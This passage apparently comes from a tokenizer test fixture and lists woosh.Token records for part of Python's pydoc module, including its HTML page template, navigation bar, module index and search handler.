woosh.Token(woosh.OP, '.', 2427, 10, 2427, 11),
woosh.Token(woosh.NAME, 'start', 2427, 11, 2427, 16),
woosh.Token(woosh.OP, '(', 2427, 16, 2427, 17),
woosh.Token(woosh.OP, ')', 2427, 17, 2427, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2427, 18, 2428, 0),
woosh.Token(woosh.COMMENT, '# Wait until thread.serving is True to make sure we are', 2428, 4, 2428, 59),
woosh.Token(woosh.COMMENT, '# really up before returning.', 2429, 4, 2429, 33),
woosh.Token(woosh.NAME, 'while', 2430, 4, 2430, 9),
woosh.Token(woosh.NAME, 'not', 2430, 10, 2430, 13),
woosh.Token(woosh.NAME, 'thread', 2430, 14, 2430, 20),
woosh.Token(woosh.OP, '.', 2430, 20, 2430, 21),
woosh.Token(woosh.NAME, 'error', 2430, 21, 2430, 26),
woosh.Token(woosh.NAME, 'and', 2430, 27, 2430, 30),
woosh.Token(woosh.NAME, 'not', 2430, 31, 2430, 34),
woosh.Token(woosh.NAME, 'thread', 2430, 35, 2430, 41),
woosh.Token(woosh.OP, '.', 2430, 41, 2430, 42),
woosh.Token(woosh.NAME, 'serving', 2430, 42, 2430, 49),
woosh.Token(woosh.OP, ':', 2430, 49, 2430, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2430, 50, 2431, 0),
woosh.Token(woosh.INDENT, ' ', 2431, 0, 2431, 8),
woosh.Token(woosh.NAME, 'time', 2431, 8, 2431, 12),
woosh.Token(woosh.OP, '.', 2431, 12, 2431, 13),
woosh.Token(woosh.NAME, 'sleep', 2431, 13, 2431, 18),
woosh.Token(woosh.OP, '(', 2431, 18, 2431, 19),
woosh.Token(woosh.NUMBER, '.01', 2431, 19, 2431, 22),
woosh.Token(woosh.OP, ')', 2431, 22, 2431, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2431, 23, 2432, 0),
woosh.Token(woosh.DEDENT, ' ', 2432, 0, 2432, 4),
woosh.Token(woosh.NAME, 'return', 2432, 4, 2432, 10),
woosh.Token(woosh.NAME, 'thread', 2432, 11, 2432, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2432, 17, 2433, 0),
woosh.Token(woosh.DEDENT, '', 2435, 0, 2435, 0),
woosh.Token(woosh.NAME, 'def', 2435, 0, 2435, 3),
woosh.Token(woosh.NAME, '_url_handler', 2435, 4, 2435, 16),
woosh.Token(woosh.OP, '(', 2435, 16, 2435, 17),
woosh.Token(woosh.NAME, 'url', 2435, 17, 2435, 20),
woosh.Token(woosh.OP, ',', 2435, 20, 2435, 21),
woosh.Token(woosh.NAME, 'content_type', 2435, 22, 2435, 34),
woosh.Token(woosh.OP, '=', 2435, 34, 2435, 35),
woosh.Token(woosh.STRING, '"text/html"', 2435, 35, 2435, 46),
woosh.Token(woosh.OP, ')', 2435, 46, 2435, 47),
woosh.Token(woosh.OP, ':', 2435, 47, 2435, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2435, 48, 2436, 0),
woosh.Token(woosh.INDENT, ' ', 2436, 0, 2436, 4),
woosh.Token(woosh.STRING, '"""The pydoc url handler for use with the pydoc server.\r\n\r\n If the content_type is \'text/css\', the _pydoc.css style\r\n sheet is read and returned if it exits.\r\n\r\n If the content_type is \'text/html\', then the result of\r\n get_html_page(url) is returned.\r\n """', 2436, 4, 2443, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2443, 7, 2444, 0),
woosh.Token(woosh.NAME, 'class', 2444, 4, 2444, 9),
woosh.Token(woosh.NAME, '_HTMLDoc', 2444, 10, 2444, 18),
woosh.Token(woosh.OP, '(', 2444, 18, 2444, 19),
woosh.Token(woosh.NAME, 'HTMLDoc', 2444, 19, 2444, 26),
woosh.Token(woosh.OP, ')', 2444, 26, 2444, 27),
woosh.Token(woosh.OP, ':', 2444, 27, 2444, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2444, 28, 2445, 0),
woosh.Token(woosh.INDENT, ' ', 2446, 0, 2446, 8),
woosh.Token(woosh.NAME, 'def', 2446, 8, 2446, 11),
woosh.Token(woosh.NAME, 'page', 2446, 12, 2446, 16),
woosh.Token(woosh.OP, '(', 2446, 16, 2446, 17),
woosh.Token(woosh.NAME, 'self', 2446, 17, 2446, 21),
woosh.Token(woosh.OP, ',', 2446, 21, 2446, 22),
woosh.Token(woosh.NAME, 'title', 2446, 23, 2446, 28),
woosh.Token(woosh.OP, ',', 2446, 28, 2446, 29),
woosh.Token(woosh.NAME, 'contents', 2446, 30, 2446, 38),
woosh.Token(woosh.OP, ')', 2446, 38, 2446, 39),
woosh.Token(woosh.OP, ':', 2446, 39, 2446, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2446, 40, 2447, 0),
woosh.Token(woosh.INDENT, ' ', 2447, 0, 2447, 12),
woosh.Token(woosh.STRING, '"""Format an HTML page."""', 2447, 12, 2447, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2447, 38, 2448, 0),
woosh.Token(woosh.NAME, 'css_path', 2448, 12, 2448, 20),
woosh.Token(woosh.OP, '=', 2448, 21, 2448, 22),
woosh.Token(woosh.STRING, '"pydoc_data/_pydoc.css"', 2448, 23, 2448, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2448, 46, 2449, 0),
woosh.Token(woosh.NAME, 'css_link', 2449, 12, 2449, 20),
woosh.Token(woosh.OP, '=', 2449, 21, 2449, 22),
woosh.Token(woosh.OP, '(', 2449, 23, 2449, 24),
woosh.Token(woosh.STRING, '\'<link rel="stylesheet" type="text/css" href="%s">\'', 2450, 16, 2450, 67),
woosh.Token(woosh.OP, '%', 2450, 68, 2450, 69),
woosh.Token(woosh.NAME, 'css_path', 2451, 16, 2451, 24),
woosh.Token(woosh.OP, ')', 2451, 24, 2451, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2451, 25, 2452, 0),
woosh.Token(woosh.NAME, 'return', 2452, 12, 2452, 18),
woosh.Token(woosh.STRING, '\'\'\'\\\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<html><head><title>Pydoc: %s</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\r\n%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>\r\n</body></html>\'\'\'', 2452, 19, 2457, 17),
woosh.Token(woosh.OP, '%', 2457, 18, 2457, 19),
woosh.Token(woosh.OP, '(', 2457, 20, 2457, 21),
woosh.Token(woosh.NAME, 'title', 2457, 21, 2457, 26),
woosh.Token(woosh.OP, ',', 2457, 26, 2457, 27),
woosh.Token(woosh.NAME, 'css_link', 2457, 28, 2457, 36),
woosh.Token(woosh.OP, ',', 2457, 36, 2457, 37),
woosh.Token(woosh.NAME, 'html_navbar', 2457, 38, 2457, 49),
woosh.Token(woosh.OP, '(', 2457, 49, 2457, 50),
woosh.Token(woosh.OP, ')', 2457, 50, 2457, 51),
woosh.Token(woosh.OP, ',', 2457, 51, 2457, 52),
woosh.Token(woosh.NAME, 'contents', 2457, 53, 2457, 61),
woosh.Token(woosh.OP, ')', 2457, 61, 2457, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2457, 62, 2458, 0),
woosh.Token(woosh.DEDENT, ' ', 2459, 0, 2459, 8),
woosh.Token(woosh.NAME, 'def', 2459, 8, 2459, 11),
woosh.Token(woosh.NAME, 'filelink', 2459, 12, 2459, 20),
woosh.Token(woosh.OP, '(', 2459, 20, 2459, 21),
woosh.Token(woosh.NAME, 'self', 2459, 21, 2459, 25),
woosh.Token(woosh.OP, ',', 2459, 25, 2459, 26),
woosh.Token(woosh.NAME, 'url', 2459, 27, 2459, 30),
woosh.Token(woosh.OP, ',', 2459, 30, 2459, 31),
woosh.Token(woosh.NAME, 'path', 2459, 32, 2459, 36),
woosh.Token(woosh.OP, ')', 2459, 36, 2459, 37),
woosh.Token(woosh.OP, ':', 2459, 37, 2459, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2459, 38, 2460, 0),
woosh.Token(woosh.INDENT, ' ', 2460, 0, 2460, 12),
woosh.Token(woosh.NAME, 'return', 2460, 12, 2460, 18),
woosh.Token(woosh.STRING, '\'<a href="getfile?key=%s">%s</a>\'', 2460, 19, 2460, 52),
woosh.Token(woosh.OP, '%', 2460, 53, 2460, 54),
woosh.Token(woosh.OP, '(', 2460, 55, 2460, 56),
woosh.Token(woosh.NAME, 'url', 2460, 56, 2460, 59),
woosh.Token(woosh.OP, ',', 2460, 59, 2460, 60),
woosh.Token(woosh.NAME, 'path', 2460, 61, 2460, 65),
woosh.Token(woosh.OP, ')', 2460, 65, 2460, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2460, 66, 2461, 0),
woosh.Token(woosh.DEDENT, ' ', 2463, 0, 2463, 4),
woosh.Token(woosh.DEDENT, '', 2463, 4, 2463, 4),
woosh.Token(woosh.NAME, 'html', 2463, 4, 2463, 8),
woosh.Token(woosh.OP, '=', 2463, 9, 2463, 10),
woosh.Token(woosh.NAME, '_HTMLDoc', 2463, 11, 2463, 19),
woosh.Token(woosh.OP, '(', 2463, 19, 2463, 20),
woosh.Token(woosh.OP, ')', 2463, 20, 2463, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2463, 21, 2464, 0),
woosh.Token(woosh.NAME, 'def', 2465, 4, 2465, 7),
woosh.Token(woosh.NAME, 'html_navbar', 2465, 8, 2465, 19),
woosh.Token(woosh.OP, '(', 2465, 19, 2465, 20),
woosh.Token(woosh.OP, ')', 2465, 20, 2465, 21),
woosh.Token(woosh.OP, ':', 2465, 21, 2465, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2465, 22, 2466, 0),
woosh.Token(woosh.INDENT, ' ', 2466, 0, 2466, 8),
woosh.Token(woosh.NAME, 'version', 2466, 8, 2466, 15),
woosh.Token(woosh.OP, '=', 2466, 16, 2466, 17),
woosh.Token(woosh.NAME, 'html', 2466, 18, 2466, 22),
woosh.Token(woosh.OP, '.', 2466, 22, 2466, 23),
woosh.Token(woosh.NAME, 'escape', 2466, 23, 2466, 29),
woosh.Token(woosh.OP, '(', 2466, 29, 2466, 30),
woosh.Token(woosh.STRING, '"%s [%s, %s]"', 2466, 30, 2466, 43),
woosh.Token(woosh.OP, '%', 2466, 44, 2466, 45),
woosh.Token(woosh.OP, '(', 2466, 46, 2466, 47),
woosh.Token(woosh.NAME, 'platform', 2466, 47, 2466, 55),
woosh.Token(woosh.OP, '.', 2466, 55, 2466, 56),
woosh.Token(woosh.NAME, 'python_version', 2466, 56, 2466, 70),
woosh.Token(woosh.OP, '(', 2466, 70, 2466, 71),
woosh.Token(woosh.OP, ')', 2466, 71, 2466, 72),
woosh.Token(woosh.OP, ',', 2466, 72, 2466, 73),
woosh.Token(woosh.NAME, 'platform', 2467, 47, 2467, 55),
woosh.Token(woosh.OP, '.', 2467, 55, 2467, 56),
woosh.Token(woosh.NAME, 'python_build', 2467, 56, 2467, 68),
woosh.Token(woosh.OP, '(', 2467, 68, 2467, 69),
woosh.Token(woosh.OP, ')', 2467, 69, 2467, 70),
woosh.Token(woosh.OP, '[', 2467, 70, 2467, 71),
woosh.Token(woosh.NUMBER, '0', 2467, 71, 2467, 72),
woosh.Token(woosh.OP, ']', 2467, 72, 2467, 73),
woosh.Token(woosh.OP, ',', 2467, 73, 2467, 74),
woosh.Token(woosh.NAME, 'platform', 2468, 47, 2468, 55),
woosh.Token(woosh.OP, '.', 2468, 55, 2468, 56),
woosh.Token(woosh.NAME, 'python_compiler', 2468, 56, 2468, 71),
woosh.Token(woosh.OP, '(', 2468, 71, 2468, 72),
woosh.Token(woosh.OP, ')', 2468, 72, 2468, 73),
woosh.Token(woosh.OP, ')', 2468, 73, 2468, 74),
woosh.Token(woosh.OP, ')', 2468, 74, 2468, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 2468, 75, 2469, 0),
woosh.Token(woosh.NAME, 'return', 2469, 8, 2469, 14),
woosh.Token(woosh.STRING, '"""\r\n <div style=\'float:left\'>\r\n Python %s<br>%s\r\n </div>\r\n <div style=\'float:right\'>\r\n <div style=\'text-align:center\'>\r\n <a href="index.html">Module Index</a>\r\n : <a href="topics.html">Topics</a>\r\n : <a href="keywords.html">Keywords</a>\r\n </div>\r\n <div>\r\n <form action="get" style=\'display:inline;\'>\r\n <input type=text name=key size=15>\r\n <input type=submit value="Get">\r\n </form> \r\n <form action="search" style=\'display:inline;\'>\r\n <input type=text name=key size=15>\r\n <input type=submit value="Search">\r\n </form>\r\n </div>\r\n </div>\r\n """', 2469, 15, 2490, 15),
woosh.Token(woosh.OP, '%', 2490, 16, 2490, 17),
woosh.Token(woosh.OP, '(', 2490, 18, 2490, 19),
woosh.Token(woosh.NAME, 'version', 2490, 19, 2490, 26),
woosh.Token(woosh.OP, ',', 2490, 26, 2490, 27),
woosh.Token(woosh.NAME, 'html', 2490, 28, 2490, 32),
woosh.Token(woosh.OP, '.', 2490, 32, 2490, 33),
woosh.Token(woosh.NAME, 'escape', 2490, 33, 2490, 39),
woosh.Token(woosh.OP, '(', 2490, 39, 2490, 40),
woosh.Token(woosh.NAME, 'platform', 2490, 40, 2490, 48),
woosh.Token(woosh.OP, '.', 2490, 48, 2490, 49),
woosh.Token(woosh.NAME, 'platform', 2490, 49, 2490, 57),
woosh.Token(woosh.OP, '(', 2490, 57, 2490, 58),
woosh.Token(woosh.NAME, 'terse', 2490, 58, 2490, 63),
woosh.Token(woosh.OP, '=', 2490, 63, 2490, 64),
woosh.Token(woosh.NAME, 'True', 2490, 64, 2490, 68),
woosh.Token(woosh.OP, ')', 2490, 68, 2490, 69),
woosh.Token(woosh.OP, ')', 2490, 69, 2490, 70),
woosh.Token(woosh.OP, ')', 2490, 70, 2490, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 2490, 71, 2491, 0),
woosh.Token(woosh.DEDENT, ' ', 2492, 0, 2492, 4),
woosh.Token(woosh.NAME, 'def', 2492, 4, 2492, 7),
woosh.Token(woosh.NAME, 'html_index', 2492, 8, 2492, 18),
woosh.Token(woosh.OP, '(', 2492, 18, 2492, 19),
woosh.Token(woosh.OP, ')', 2492, 19, 2492, 20),
woosh.Token(woosh.OP, ':', 2492, 20, 2492, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2492, 21, 2493, 0),
woosh.Token(woosh.INDENT, ' ', 2493, 0, 2493, 8),
woosh.Token(woosh.STRING, '"""Module Index page."""', 2493, 8, 2493, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2493, 32, 2494, 0),
woosh.Token(woosh.NAME, 'def', 2495, 8, 2495, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2495, 12, 2495, 21),
woosh.Token(woosh.OP, '(', 2495, 21, 2495, 22),
woosh.Token(woosh.NAME, 'name', 2495, 22, 2495, 26),
woosh.Token(woosh.OP, ')', 2495, 26, 2495, 27),
woosh.Token(woosh.OP, ':', 2495, 27, 2495, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2495, 28, 2496, 0),
woosh.Token(woosh.INDENT, ' ', 2496, 0, 2496, 12),
woosh.Token(woosh.NAME, 'return', 2496, 12, 2496, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 2496, 19, 2496, 45),
woosh.Token(woosh.OP, '%', 2496, 46, 2496, 47),
woosh.Token(woosh.OP, '(', 2496, 48, 2496, 49),
woosh.Token(woosh.NAME, 'name', 2496, 49, 2496, 53),
woosh.Token(woosh.OP, ',', 2496, 53, 2496, 54),
woosh.Token(woosh.NAME, 'name', 2496, 55, 2496, 59),
woosh.Token(woosh.OP, ')', 2496, 59, 2496, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2496, 60, 2497, 0),
woosh.Token(woosh.DEDENT, ' ', 2498, 0, 2498, 8),
woosh.Token(woosh.NAME, 'heading', 2498, 8, 2498, 15),
woosh.Token(woosh.OP, '=', 2498, 16, 2498, 17),
woosh.Token(woosh.NAME, 'html', 2498, 18, 2498, 22),
woosh.Token(woosh.OP, '.', 2498, 22, 2498, 23),
woosh.Token(woosh.NAME, 'heading', 2498, 23, 2498, 30),
woosh.Token(woosh.OP, '(', 2498, 30, 2498, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Index of Modules</strong></big></big>'", 2499, 12, 2499, 69),
woosh.Token(woosh.OP, ',', 2499, 69, 2499, 70),
woosh.Token(woosh.STRING, "'#ffffff'", 2500, 12, 2500, 21),
woosh.Token(woosh.OP, ',', 2500, 21, 2500, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2500, 23, 2500, 32),
woosh.Token(woosh.OP, ')', 2500, 32, 2500, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2500, 33, 2501, 0),
woosh.Token(woosh.NAME, 'names', 2501, 8, 2501, 13),
woosh.Token(woosh.OP, '=', 2501, 14, 2501, 15),
woosh.Token(woosh.OP, '[', 2501, 16, 2501, 17),
woosh.Token(woosh.NAME, 'name', 2501, 17, 2501, 21),
woosh.Token(woosh.NAME, 'for', 2501, 22, 2501, 25),
woosh.Token(woosh.NAME, 'name', 2501, 26, 2501, 30),
woosh.Token(woosh.NAME, 'in', 2501, 31, 2501, 33),
woosh.Token(woosh.NAME, 'sys', 2501, 34, 2501, 37),
woosh.Token(woosh.OP, '.', 2501, 37, 2501, 38),
woosh.Token(woosh.NAME, 'builtin_module_names', 2501, 38, 2501, 58),
woosh.Token(woosh.NAME, 'if', 2502, 17, 2502, 19),
woosh.Token(woosh.NAME, 'name', 2502, 20, 2502, 24),
woosh.Token(woosh.OP, '!=', 2502, 25, 2502, 27),
woosh.Token(woosh.STRING, "'__main__'", 2502, 28, 2502, 38),
woosh.Token(woosh.OP, ']', 2502, 38, 2502, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2502, 39, 2503, 0),
woosh.Token(woosh.NAME, 'contents', 2503, 8, 2503, 16),
woosh.Token(woosh.OP, '=', 2503, 17, 2503, 18),
woosh.Token(woosh.NAME, 'html', 2503, 19, 2503, 23),
woosh.Token(woosh.OP, '.', 2503, 23, 2503, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2503, 24, 2503, 35),
woosh.Token(woosh.OP, '(', 2503, 35, 2503, 36),
woosh.Token(woosh.NAME, 'names', 2503, 36, 2503, 41),
woosh.Token(woosh.OP, ',', 2503, 41, 2503, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2503, 43, 2503, 52),
woosh.Token(woosh.OP, ')', 2503, 52, 2503, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2503, 53, 2504, 0),
woosh.Token(woosh.NAME, 'contents', 2504, 8, 2504, 16),
woosh.Token(woosh.OP, '=', 2504, 17, 2504, 18),
woosh.Token(woosh.OP, '[', 2504, 19, 2504, 20),
woosh.Token(woosh.NAME, 'heading', 2504, 20, 2504, 27),
woosh.Token(woosh.OP, ',', 2504, 27, 2504, 28),
woosh.Token(woosh.STRING, "'<p>'", 2504, 29, 2504, 34),
woosh.Token(woosh.OP, '+', 2504, 35, 2504, 36),
woosh.Token(woosh.NAME, 'html', 2504, 37, 2504, 41),
woosh.Token(woosh.OP, '.', 2504, 41, 2504, 42),
woosh.Token(woosh.NAME, 'bigsection', 2504, 42, 2504, 52),
woosh.Token(woosh.OP, '(', 2504, 52, 2504, 53),
woosh.Token(woosh.STRING, "'Built-in Modules'", 2505, 12, 2505, 30),
woosh.Token(woosh.OP, ',', 2505, 30, 2505, 31),
woosh.Token(woosh.STRING, "'#ffffff'", 2505, 32, 2505, 41),
woosh.Token(woosh.OP, ',', 2505, 41, 2505, 42),
woosh.Token(woosh.STRING, "'#ee77aa'", 2505, 43, 2505, 52),
woosh.Token(woosh.OP, ',', 2505, 52, 2505, 53),
woosh.Token(woosh.NAME, 'contents', 2505, 54, 2505, 62),
woosh.Token(woosh.OP, ')', 2505, 62, 2505, 63),
woosh.Token(woosh.OP, ']', 2505, 63, 2505, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2505, 64, 2506, 0),
woosh.Token(woosh.NAME, 'seen', 2507, 8, 2507, 12),
woosh.Token(woosh.OP, '=', 2507, 13, 2507, 14),
woosh.Token(woosh.OP, '{', 2507, 15, 2507, 16),
woosh.Token(woosh.OP, '}', 2507, 16, 2507, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2507, 17, 2508, 0),
woosh.Token(woosh.NAME, 'for', 2508, 8, 2508, 11),
woosh.Token(woosh.NAME, 'dir', 2508, 12, 2508, 15),
woosh.Token(woosh.NAME, 'in', 2508, 16, 2508, 18),
woosh.Token(woosh.NAME, 'sys', 2508, 19, 2508, 22),
woosh.Token(woosh.OP, '.', 2508, 22, 2508, 23),
woosh.Token(woosh.NAME, 'path', 2508, 23, 2508, 27),
woosh.Token(woosh.OP, ':', 2508, 27, 2508, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2508, 28, 2509, 0),
woosh.Token(woosh.INDENT, ' ', 2509, 0, 2509, 12),
woosh.Token(woosh.NAME, 'contents', 2509, 12, 2509, 20),
woosh.Token(woosh.OP, '.', 2509, 20, 2509, 21),
woosh.Token(woosh.NAME, 'append', 2509, 21, 2509, 27),
woosh.Token(woosh.OP, '(', 2509, 27, 2509, 28),
woosh.Token(woosh.NAME, 'html', 2509, 28, 2509, 32),
woosh.Token(woosh.OP, '.', 2509, 32, 2509, 33),
woosh.Token(woosh.NAME, 'index', 2509, 33, 2509, 38),
woosh.Token(woosh.OP, '(', 2509, 38, 2509, 39),
woosh.Token(woosh.NAME, 'dir', 2509, 39, 2509, 42),
woosh.Token(woosh.OP, ',', 2509, 42, 2509, 43),
woosh.Token(woosh.NAME, 'seen', 2509, 44, 2509, 48),
woosh.Token(woosh.OP, ')', 2509, 48, 2509, 49),
woosh.Token(woosh.OP, ')', 2509, 49, 2509, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2509, 50, 2510, 0),
woosh.Token(woosh.DEDENT, ' ', 2511, 0, 2511, 8),
woosh.Token(woosh.NAME, 'contents', 2511, 8, 2511, 16),
woosh.Token(woosh.OP, '.', 2511, 16, 2511, 17),
woosh.Token(woosh.NAME, 'append', 2511, 17, 2511, 23),
woosh.Token(woosh.OP, '(', 2511, 23, 2511, 24),
woosh.Token(woosh.STRING, '\'<p align=right><font color="#909090" face="helvetica,\'', 2512, 12, 2512, 67),
woosh.Token(woosh.STRING, '\'arial"><strong>pydoc</strong> by Ka-Ping Yee\'', 2513, 12, 2513, 58),
woosh.Token(woosh.STRING, "'<ping@lfw.org></font>'", 2514, 12, 2514, 41),
woosh.Token(woosh.OP, ')', 2514, 41, 2514, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2514, 42, 2515, 0),
woosh.Token(woosh.NAME, 'return', 2515, 8, 2515, 14),
woosh.Token(woosh.STRING, "'Index of Modules'", 2515, 15, 2515, 33),
woosh.Token(woosh.OP, ',', 2515, 33, 2515, 34),
woosh.Token(woosh.STRING, "''", 2515, 35, 2515, 37),
woosh.Token(woosh.OP, '.', 2515, 37, 2515, 38),
woosh.Token(woosh.NAME, 'join', 2515, 38, 2515, 42),
woosh.Token(woosh.OP, '(', 2515, 42, 2515, 43),
woosh.Token(woosh.NAME, 'contents', 2515, 43, 2515, 51),
woosh.Token(woosh.OP, ')', 2515, 51, 2515, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2515, 52, 2516, 0),
woosh.Token(woosh.DEDENT, ' ', 2517, 0, 2517, 4),
woosh.Token(woosh.NAME, 'def', 2517, 4, 2517, 7),
woosh.Token(woosh.NAME, 'html_search', 2517, 8, 2517, 19),
woosh.Token(woosh.OP, '(', 2517, 19, 2517, 20),
woosh.Token(woosh.NAME, 'key', 2517, 20, 2517, 23),
woosh.Token(woosh.OP, ')', 2517, 23, 2517, 24),
woosh.Token(woosh.OP, ':', 2517, 24, 2517, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2517, 25, 2518, 0),
woosh.Token(woosh.INDENT, ' ', 2518, 0, 2518, 8),
woosh.Token(woosh.STRING, '"""Search results page."""', 2518, 8, 2518, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2518, 34, 2519, 0),
woosh.Token(woosh.COMMENT, '# scan for modules', 2519, 8, 2519, 26),
woosh.Token(woosh.NAME, 'search_result', 2520, 8, 2520, 21),
woosh.Token(woosh.OP, '=', 2520, 22, 2520, 23),
woosh.Token(woosh.OP, '[', 2520, 24, 2520, 25),
woosh.Token(woosh.OP, ']', 2520, 25, 2520, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2520, 26, 2521, 0),
woosh.Token(woosh.NAME, 'def', 2522, 8, 2522, 11),
woosh.Token(woosh.NAME, 'callback', 2522, 12, 2522, 20),
woosh.Token(woosh.OP, '(', 2522, 20, 2522, 21),
woosh.Token(woosh.NAME, 'path', 2522, 21, 2522, 25),
woosh.Token(woosh.OP, ',', 2522, 25, 2522, 26),
woosh.Token(woosh.NAME, 'modname', 2522, 27, 2522, 34),
woosh.Token(woosh.OP, ',', 2522, 34, 2522, 35),
woosh.Token(woosh.NAME, 'desc', 2522, 36, 2522, 40),
woosh.Token(woosh.OP, ')', 2522, 40, 2522, 41),
woosh.Token(woosh.OP, ':', 2522, 41, 2522, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2522, 42, 2523, 0),
woosh.Token(woosh.INDENT, ' ', 2523, 0, 2523, 12),
woosh.Token(woosh.NAME, 'if', 2523, 12, 2523, 14),
woosh.Token(woosh.NAME, 'modname', 2523, 15, 2523, 22),
woosh.Token(woosh.OP, '[', 2523, 22, 2523, 23),
woosh.Token(woosh.OP, '-', 2523, 23, 2523, 24),
woosh.Token(woosh.NUMBER, '9', 2523, 24, 2523, 25),
woosh.Token(woosh.OP, ':', 2523, 25, 2523, 26),
woosh.Token(woosh.OP, ']', 2523, 26, 2523, 27),
woosh.Token(woosh.OP, '==', 2523, 28, 2523, 30),
woosh.Token(woosh.STRING, "'.__init__'", 2523, 31, 2523, 42),
woosh.Token(woosh.OP, ':', 2523, 42, 2523, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2523, 43, 2524, 0),
woosh.Token(woosh.INDENT, ' ', 2524, 0, 2524, 16),
woosh.Token(woosh.NAME, 'modname', 2524, 16, 2524, 23),
woosh.Token(woosh.OP, '=', 2524, 24, 2524, 25),
woosh.Token(woosh.NAME, 'modname', 2524, 26, 2524, 33),
woosh.Token(woosh.OP, '[', 2524, 33, 2524, 34),
woosh.Token(woosh.OP, ':', 2524, 34, 2524, 35),
woosh.Token(woosh.OP, '-', 2524, 35, 2524, 36),
woosh.Token(woosh.NUMBER, '9', 2524, 36, 2524, 37),
woosh.Token(woosh.OP, ']', 2524, 37, 2524, 38),
woosh.Token(woosh.OP, '+', 2524, 39, 2524, 40),
woosh.Token(woosh.STRING, "' (package)'", 2524, 41, 2524, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2524, 53, 2525, 0),
woosh.Token(woosh.DEDENT, ' ', 2525, 0, 2525, 12),
woosh.Token(woosh.NAME, 'search_result', 2525, 12, 2525, 25),
woosh.Token(woosh.OP, '.', 2525, 25, 2525, 26),
woosh.Token(woosh.NAME, 'append', 2525, 26, 2525, 32),
woosh.Token(woosh.OP, '(', 2525, 32, 2525, 33),
woosh.Token(woosh.OP, '(', 2525, 33, 2525, 34),
woosh.Token(woosh.NAME, 'modname', 2525, 34, 2525, 41),
woosh.Token(woosh.OP, ',', 2525, 41, 2525, 42),
woosh.Token(woosh.NAME, 'desc', 2525, 43, 2525, 47),
woosh.Token(woosh.NAME, 'and', 2525, 48, 2525, 51),
woosh.Token(woosh.STRING, "'- '", 2525, 52, 2525, 56),
woosh.Token(woosh.OP, '+', 2525, 57, 2525, 58),
woosh.Token(woosh.NAME, 'desc', 2525, 59, 2525, 63),
woosh.Token(woosh.OP, ')', 2525, 63, 2525, 64),
woosh.Token(woosh.OP, ')', 2525, 64, 2525, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2525, 65, 2526, 0),
woosh.Token(woosh.DEDENT, ' ', 2527, 0, 2527, 8),
woosh.Token(woosh.NAME, 'with', 2527, 8, 2527, 12),
woosh.Token(woosh.NAME, 'warnings', 2527, 13, 2527, 21),
woosh.Token(woosh.OP, '.', 2527, 21, 2527, 22),
woosh.Token(woosh.NAME, 'catch_warnings', 2527, 22, 2527, 36),
woosh.Token(woosh.OP, '(', 2527, 36, 2527, 37),
woosh.Token(woosh.OP, ')', 2527, 37, 2527, 38),
woosh.Token(woosh.OP, ':', 2527, 38, 2527, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2527, 39, 2528, 0),
woosh.Token(woosh.INDENT, ' ', 2528, 0, 2528, 12),
woosh.Token(woosh.NAME, 'warnings', 2528, 12, 2528, 20),
woosh.Token(woosh.OP, '.', 2528, 20, 2528, 21),
woosh.Token(woosh.NAME, 'filterwarnings', 2528, 21, 2528, 35),
woosh.Token(woosh.OP, '(', 2528, 35, 2528, 36),
woosh.Token(woosh.STRING, "'ignore'", 2528, 36, 2528, 44),
woosh.Token(woosh.OP, ')', 2528, 44, 2528, 45),
woosh.Token(woosh.COMMENT, '# ignore problems during import', 2528, 46, 2528, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 2528, 77, 2529, 0),
woosh.Token(woosh.NAME, 'def', 2529, 12, 2529, 15),
woosh.Token(woosh.NAME, 'onerror', 2529, 16, 2529, 23),
woosh.Token(woosh.OP, '(', 2529, 23, 2529, 24),
woosh.Token(woosh.NAME, 'modname', 2529, 24, 2529, 31),
woosh.Token(woosh.OP, ')', 2529, 31, 2529, 32),
woosh.Token(woosh.OP, ':', 2529, 32, 2529, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2529, 33, 2530, 0),
